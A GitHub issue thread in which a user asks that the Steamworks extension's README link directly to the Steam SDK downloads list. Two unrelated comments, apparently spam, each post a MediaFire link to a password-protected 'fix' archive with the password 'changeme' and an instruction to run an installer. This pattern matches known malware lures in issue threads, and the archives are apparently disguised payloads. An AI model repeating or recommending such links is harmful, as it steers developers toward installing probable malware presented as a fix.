### ISSUE TITLE
[README Request] Change steam v.155 download link

### ISSUE THREAD

**Issue by Gizmo199** [YoYoGames/GMEXT-Steamworks#91]
Currently the link on this repo redirects you to your steam dashboard, where there is only a button to download the latest SDK version:
![image](https://github.com/user-attachments/assets/511069a5-a808-4731-bf60-365557a39f93)

This could be due to not having a developer account, but even with the developer account, this link requires 1 extra click that feels unnecessary. :)
Instead, I think it would be much better to link directly to the downloads list via **https://partner.steamgames.com/downloads/list** considering that GM requires (at the time of writing this) an older version of the SDK.

Thank you for your time! :)

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
